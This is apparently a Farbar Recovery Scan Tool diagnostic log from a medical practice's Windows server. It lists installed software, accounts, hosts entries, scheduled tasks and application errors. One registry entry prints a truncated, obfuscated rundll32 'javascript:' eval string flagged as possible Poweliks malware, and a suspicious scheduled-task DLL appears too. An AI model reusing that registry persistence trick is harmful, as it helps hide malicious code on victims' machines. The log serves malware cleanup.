2014-10-16 14:58 - 2013-04-19 14:39 - 00000000 ____D () C:\Users\Server\Documents\DEMOS- Misc
2014-10-16 09:12 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-16 03:15 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 02:35 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 02:26 - 2011-03-29 11:40 - 00000000 ____D () C:\Users\postgres
2014-10-16 02:26 - 2009-07-13 23:33 - 03770576 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:23 - 2014-05-06 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:07 - 2011-02-01 15:52 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 07:48 - 2013-07-29 14:18 - 00000000 ____D () C:\Windows\system32\Drivers\NIS
2014-10-15 07:45 - 2013-11-18 20:26 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Internet Security
2014-10-15 07:45 - 2013-07-29 14:19 - 00002425 _____ () C:\Users\Public\Desktop\Norton Internet Security.lnk
2014-10-15 07:44 - 2014-01-20 10:45 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-10-14 15:03 - 2013-09-04 09:53 - 00000000 ____D () C:\Users\Server\Documents\HMS BIOS
2014-10-14 14:01 - 2013-09-03 15:01 - 00000000 ____D () C:\Users\Server\Documents\VACCINATIONS
2014-10-14 10:14 - 2013-09-04 10:12 - 00000000 ____D () C:\Users\Server\Documents\BLANK FORMS
2014-10-07 15:52 - 2011-02-03 15:28 - 00000000 ____D () C:\Users\Server\Documents\MISC
 
Some content of TEMP:
====================
C:\Users\Dr. Shapiro\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\Dr. Shapiro\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\medadmin\AppData\Local\Temp\jre-6u24-windows-i586-iftw-rv.exe
C:\Users\Server\AppData\Local\Temp\ose00000.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-15 23:04
 
==================== End Of Log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 04-11-2014
Ran by Server at 2014-11-04 13:47:13
Running from C:\Users\Server\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Internet Security (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Internet Security (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
32 Bit HP CIO Components Installer (Version: 17.1.1 - Hewlett-Packard) Hidden
Acrobat X Suite (HKLM\...\{3F41BA46-09C3-4500-96D7-DC4390AD0124}) (Version: 1.0 - Adobe Systems Incorporated)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.6 - Adobe Systems)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.5.1.17730 - Adobe Systems Inc.)
Adobe Captivate Quiz Results Analyzer (HKLM\...\QuizResultsAnalyzer.E7BED6E5DDA59983786DD72EBFA46B1598278E07.1) (Version: 1.0 - Adobe Systems Incorporated)
Adobe Captivate Reviewer (HKLM\...\AdobeCaptivateReviewer2.E7BED6E5DDA59983786DD72EBFA46B1598278E07.1) (Version: 2.0 - Adobe Systems Incorporated)
Adobe Community Help (HKLM\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.3.0.800 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Media Player (HKLM\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Amazon Cloud Player (HKCU\...\Amazon Amazon Cloud Player) (Version: 1.5.0.341 - Amazon Services LLC)
Amazon MP3 Downloader 1.0.17 (HKLM\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Avery Template (HKLM\...\{A760067A-C07E-1033-0000-A764AC000011}) (Version: 2.0.0.0 - Avery)
Bing Bar (HKLM\...\{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}) (Version: 7.0.609.0 - Microsoft Corporation)
Bing Rewards Client Installer (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Broadcom Gigabit NetLink Controller (HKLM\...\{A325B368-A9EC-40EF-A95C-9DEAD3683AE3}) (Version: 12.33.02 - Broadcom Corporation)
Broadcom Management Programs (HKLM\...\{5DB87A63-9420-48CC-9F9A-B8801D38D6B5}) (Version: 12.35.01 - Broadcom Corporation)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
Crystal Reports Basic Runtime for Visual Studio 2008 (HKLM\...\{CE26F10F-C80F-4377-908B-1B7882AE2CE3}) (Version: 10.5.1.0 - Business Objects)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{4688EB75-28E2-4731-9BCB-55E624F7CD45}) (Version: 1.3 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{3138EAD3-700B-4A10-B617-B3F8096EE30D}) (Version: 1.0.0 - Dell Inc)
FileZilla Client 3.3.5.1 (HKLM\...\FileZilla Client) (Version: 3.3.5.1 - )
HP Deskjet 3050 J610 series Basic Device Software (HKLM\...\{0564C76B-8E1F-4157-8654-B0F9F308BEE9}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 3050 J610 series Help (HKLM\...\{F7632A9B-661E-4FD9-B1A4-3B86BC99847F}) (Version: 140.0.63.63 - Hewlett Packard)
HP Deskjet 3050 J610 series Product Improvement Study (HKLM\...\{34E90074-C80C-4182-A995-65E88B5B56E0}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Photosmart 5510 series Help (HKLM\...\{E02964EA-0E1B-4620-A26E-CBAB0341B1BB}) (Version: 140.0.2.2 - Hewlett Packard)
HP Photosmart 5510 series Product Improvement Study (HKLM\...\{ED696A09-A237-4A29-95FF-95DC4AA8EA1A}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
I.R.I.S. OCR (HKLM\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.1995 - Intel Corporation)
iTivity (HKLM\...\{B4DB7658-A8D2-458C-B68C-9DBA74F1CCD3}) (Version: 5.04.0200 - Tridia Corporation)
Java 2 Runtime Environment Standard Edition v1.3.1_09 (HKLM\...\{70F80C1E-5F26-11D7-88D1-0050DA21757E}) (Version:  - )
Java™ 6 Update 21 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216021F0}) (Version: 6.0.210 - Oracle)
Java™ 6 Update 26 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216022FF}) (Version: 6.0.260 - Oracle)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LG USB Modem driver (HKLM\...\{C3ABE126-2BB2-4246-BFE1-6797679B3579}) (Version:  - )
LiveUpdate 3.3 (Symantec Corporation) (HKLM\...\LiveUpdate) (Version: 3.3.0.101 - Symantec Corporation)
LogMeIn (HKLM\...\{D3AE96EE-2876-4B3F-847C-D3A4AD689E43}) (Version: 4.1.1578 - LogMeIn, Inc.)
Malwarebytes' Anti-Malware (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version:  - Malwarebytes Corporation)
Medical Manager Network Services (HKLM\...\Medical Manager Network Services) (Version:  - )
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Sounds (HKLM\...\{10CE1EA2-12E9-11D3-825E-00C04F6843FE}) (Version: 1.0.0.0 - Microsoft Corp)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Module SDK (HKLM\...\{AE5D0144-A524-4A89-99E8-B8D93C4779D2}) (Version: 1.0.1 - Sage Payment Solutions)
Mozilla Firefox 32.0.2 (x86 en-US) (HKLM\...\Mozilla Firefox 32.0.2 (x86 en-US)) (Version: 32.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 32.0.2 - Mozilla)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NetUtils (HKLM\...\NetUtils) (Version:  - )
Norton Internet Security (HKLM\...\NIS) (Version: 21.6.0.32 - Symantec Corporation)
PDF Settings CS5 (Version: 10.0 - Adobe Systems Incorporated) Hidden
Postgres Plus 8.3 (HKLM\...\{883CB130-D056-4D0E-A59F-6EA0A1935985}) (Version: 8.3 - EnterpriseDB/PostgreSQL Global Development Group)
Python 2.5 psycopg2-2.0.14 (HKLM\...\psycopg2-py2.5) (Version:  - )
Python 2.5 pywin32-214 (HKLM\...\pywin32-py2.5) (Version:  - )
Python 2.5 setuptools-0.6c9 (HKLM\...\setuptools-py2.5) (Version:  - )
Python 2.5.4 (HKLM\...\{2E0DFC24-7C4B-4DCF-BCC7-81C513BED3BC}) (Version: 2.5.4150 - Python Software Foundation)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5936 - )
rmss (HKLM\...\{EAF0F9B2-8559-41E8-BBEF-818086AFF696}) (Version: 1.00.000 - Vitera Healthcare Solutions, LLC)
Sage Medical Manager (HKLM\...\{7BF7273F-DBDF-4AB9-B41C-A85B67E1FD75}) (Version: 11.01.00 - Sage Software Healthcare, Inc.)
Sage Medical Manager AppServer (HKLM\...\MMWin AppServer) (Version:  - )
Sage Medical Manager Desktop (HKLM\...\InstallShield_{034135FC-6BD3-4973-BDAA-D408AA058CE7}) (Version: 11.01.00 - Sage Software Healthcare, LLC)
Sage Medical Manager Desktop (Version: 11.01.00 - Sage Software Healthcare, LLC) Hidden
Sage Medical Manager Desktop Server (HKLM\...\InstallShield_{DE630827-F05E-4BD7-989A-8EDA29626BFE}) (Version: 11.01.00 - Sage Software Healthcare, LLC.)
Sage Medical Manager Desktop Server (Version: 11.01.00 - Sage Software Healthcare, LLC.) Hidden
Sage Medical Manager Server (Version: 11.01.00 - Sage Software Healthcare, Inc.) Hidden
Seagate Dashboard (HKLM\...\{67445E65-3D93-428F-83A5-446F7D02689A}) (Version: 3.0.34.1 - Seagate)
SIW version 2010.04.28 (HKLM\...\{AB67580-257C-45FF-B8F4-C8C30682091A}_is1) (Version: 2010.04.28 - Topala Software Solutions)
SmartPrintAPC (HKLM\...\{7F0FF673-BCA7-4A2A-B11C-4D366AF9630B}) (Version: 1.03.0005 - Jones Medical Instrument Company)
The Medical Manager (HKLM\...\The Medical Manager) (Version:  - )
TinyTERM (HKLM\...\{EFF75E8A-5672-49F2-BF99-221BD7C10D66}) (Version: 4.60 - Century Software)
TinyTERM 3.3.10 (HKLM\...\TinyTERM 3.3.10) (Version:  - )
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version:  - )
Yahoo! Detect (HKLM\...\YTdetect) (Version:  - )
ZocDoc Alerter v1104 (HKLM\...\ZocDoc Alerter) (Version: v1104 - ZocDoc)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1000_Classes\CLSID\{3f04dadf-6ea4-44d1-a507-03cad176f443}\InprocServer32 -> C:\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1008_Classes\CLSID\{3f04dadf-6ea4-44d1-a507-03cad176f443}\InprocServer32 -> C:\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1008_Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32 -> C:\Program Files\Sage Software\jre\bin\npjava131_09.dll (JavaSoft / Sun Microsystems, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1008_Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBA}\InprocServer32 -> C:\Program Files\Sage Software\jre\bin\npjava131_09.dll (JavaSoft / Sun Microsystems, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1008_Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBB}\InprocServer32 -> C:\Program Files\Sage Software\jre\bin\npjava131_09.dll (JavaSoft / Sun Microsystems, Inc.)
 
==================== Restore Points  =========================
 
30-10-2014 17:53:02 Removed HP Photosmart 5510 series Basic Device Software
30-10-2014 20:06:46 Removed HP Officejet 4630 series Basic Device Software
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:04 - 2012-05-09 09:00 - 00001062 ____N C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 activate.adobe.com
65.124.231.35 envoylinkbatch.webmd.com
198.31.9.13 wit.envoy.com
170.138.220.213 itsbatch.emdeon.com
170.138.220.169 its.emdeon.com
64.88.171.98 sts.sagehealth.com
64.57.254.68 prod.trxserv.com
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {07ADA4D7-2417-4C0E-B1DB-AC46581D3B9D} - System32\Tasks\AdobeAAMUpdater-1.0-MMSERV-Server => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-11-08] (Adobe Systems Incorporated)
Task: {119F97B6-2A8B-416C-8564-E3C72359F250} - System32\Tasks\Amazon Music Helper => C:\Users\Server\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe [2013-09-10] ()
Task: {1AB06CDA-FEF2-46D4-BCCA-33342E89C573} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files\Norton Internet Security\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {25161145-8209-42A1-A146-E16CF2D2B600} - System32\Tasks\Server Merge => C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe [2014-02-10] (Seagate Technology LLC)
Task: {293E728F-6EFA-43FC-A9A2-8E411434201B} - System32\Tasks\HPCustParticipation HP Photosmart 5510 series => C:\Program Files\HP\HP Photosmart 5510 series\Bin\HPCustPartic.exe [2011-05-25] (Hewlett-Packard Co.)
Task: {46A7CBEB-1240-4D2F-A17B-40E7C51E8383} - System32\Tasks\Server DBAgent 2 0 => C:\Program Files\Seagate\Seagate Dashboard 2.0\DBAgent.exe [2014-02-10] (Seagate Technology LLC)
Task: {556EFB97-5513-4671-AF66-6B8D8E39DDBE} - System32\Tasks\Server1 => C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe [2014-02-10] (Seagate Technology LLC)
Task: {6EE58970-8A0E-4559-8B1F-4CCBE9D0D051} - System32\Tasks\HPCustParticipation HP Deskjet 3050 J610 series => C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\HPCustPartic.exe [2010-11-16] (Hewlett-Packard Co.)
Task: {9668D40A-975C-4784-BF10-82A2029C2AE1} - System32\Tasks\Server => C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe [2014-02-10] (Seagate Technology LLC)
Task: {B5560C31-779C-4D2C-8647-63E4259FCC28} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-25] (Adobe Systems Incorporated)
Task: {BE5E744F-4FDF-4D6E-859A-E61CE8CA8C74} - System32\Tasks\Seagate_Install_Launch => C:\Program Files\Seagate\Seagate Dashboard 2.0\Dashboard.exe [2014-02-10] (Seagate Technology LLC)
Task: {C8DF92BD-609D-4CB3-ADF0-8D9107E6AC9D} - System32\Tasks\Server1 Merge => C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe [2014-02-10] (Seagate Technology LLC)
Task: {DBF9D3CA-B4A4-451A-B804-4C2DA6EFF34B} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files\Norton Internet Security\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {EE9BA34B-A39F-49DA-B8ED-54735F7BBCE6} - System32\Tasks\{BF532EAA-CEA7-E71B-B906-BABCA179D4D5} => C:\Windows\system32\jvnnbbh.dll [2014-10-31] ()
Task: {F1F6B8D0-597A-4B03-B3B1-9A4CEE1BA713} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Internet Security\Engine\21.6.0.32\WSCStub.exe [2014-09-21] (Symantec Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
 
==================== Loaded Modules (whitelisted) =============
 
2009-03-18 10:14 - 2009-03-18 10:14 - 00107976 _____ () C:\Program Files\Century\TinyTERM\CenLPD.exe
2011-02-01 17:02 - 2010-11-08 05:48 - 00110592 _____ () C:\Program Files\Medical Manager Corporation\AppServer\mmservice.exe
2010-11-21 09:54 - 2010-11-21 09:54 - 00094208 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2009-12-10 03:45 - 2009-12-10 03:45 - 00167936 _____ () C:\PostgresPlus\8.3\bin\LIBPQ.dll
2011-03-28 11:32 - 2012-11-20 14:26 - 00094337 _____ () C:\Program Files\rmss\WIN_MONITOR.exe
2011-03-28 11:32 - 2012-11-20 14:27 - 01212416 _____ () C:\Program Files\rmss\winprocmessage.exe
2011-03-28 11:32 - 2007-10-03 18:09 - 00378743 _____ () C:\Program Files\rmss\sqlite3.dll
2011-03-28 11:32 - 2012-11-20 14:27 - 00823296 _____ () C:\Program Files\rmss\win_server.exe
2009-03-13 16:19 - 2009-03-13 16:19 - 00963584 _____ () C:\PostgresPlus\8.3\bin\libxml2.dll
2009-03-13 16:19 - 2009-03-13 16:19 - 00059904 _____ () C:\PostgresPlus\8.3\bin\zlib1.dll
2009-03-24 16:08 - 2009-03-24 16:08 - 00026624 _____ () C:\PostgresPlus\8.3\lib\plugins\plugin_debugger.dll
2011-02-18 12:31 - 2010-03-15 11:28 - 00141824 _____ () C:\Program Files\WinRAR\rarext.dll
2013-10-01 13:37 - 2013-09-10 19:51 - 03109376 _____ () C:\Users\Server\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
2011-03-29 11:13 - 2010-10-25 12:58 - 00106496 _____ () C:\MED\JDF\service\Wrapper.exe
2011-03-29 11:13 - 2010-10-25 12:51 - 00049152 _____ () C:\MED\JDF\service\Wrapper.dll
2011-02-01 16:05 - 2011-02-01 16:05 - 00095232 _____ () C:\Program Files\Adobe\Adobe Captivate Quiz Results Analyzer\Adobe Captivate Quiz Results Analyzer.exe
2014-11-04 12:35 - 2014-11-04 12:35 - 00718152 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\libglesv2.dll
2014-11-04 12:35 - 2014-11-04 12:35 - 00126280 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\libegl.dll
2014-11-04 12:35 - 2014-11-04 12:35 - 08537928 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\pdf.dll
2014-11-04 12:35 - 2014-11-04 12:35 - 00353096 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\ppGoogleNaClPluginChrome.dll
2014-11-04 12:35 - 2014-11-04 12:35 - 01732936 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SMR322 => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: DBRMTray => C:\Dell\DBRM\Reminder\DbrmTrayIcon.exe
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe -s
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-2237751552-2111478436-699371372-500 - Administrator - Disabled)
Dr. Shapiro (S-1-5-21-2237751552-2111478436-699371372-1003 - Administrator - Enabled) => C:\Users\Dr. Shapiro
Guest (S-1-5-21-2237751552-2111478436-699371372-501 - Limited - Enabled)
HP_Owner (S-1-5-21-2237751552-2111478436-699371372-1004 - Administrator - Enabled)
LogMeInRemoteUser (S-1-5-21-2237751552-2111478436-699371372-1002 - Administrator - Enabled) => C:\Users\LogMeInRemoteUser
medadmin (S-1-5-21-2237751552-2111478436-699371372-1007 - Administrator - Enabled) => C:\Users\medadmin
medical (S-1-5-21-2237751552-2111478436-699371372-1009 - Administrator - Enabled) => C:\Users\medical
postgres (S-1-5-21-2237751552-2111478436-699371372-1008 - Limited - Enabled) => C:\Users\postgres
Server (S-1-5-21-2237751552-2111478436-699371372-1000 - Administrator - Enabled) => C:\Users\Server
 
==================== Faulty Device Manager Devices =============
 
Name: Broadcom NetLink ™ Gigabit Ethernet
Description: Broadcom NetLink ™ Gigabit Ethernet
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Broadcom
Service: k57nd60x
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/04/2014 00:33:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c91
Faulting process id: 0xd2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/04/2014 00:19:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: med.exe, version: 0.0.0.0, time stamp: 0x4ce2cd41
Faulting module name: rundml.dll_unloaded, version: 0.0.0.0, time stamp: 0x4ce2d07b
Exception code: 0xc0000005
Fault offset: 0x100a6699
Faulting process id: 0x1d94
Faulting application start time: 0xmed.exe0
Faulting application path: med.exe1
Faulting module path: med.exe2
Report Id: med.exe3
 
Error: (11/04/2014 10:54:31 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x3cd0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/02/2014 11:36:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x6494
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/02/2014 10:08:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x6bb8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/02/2014 07:31:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
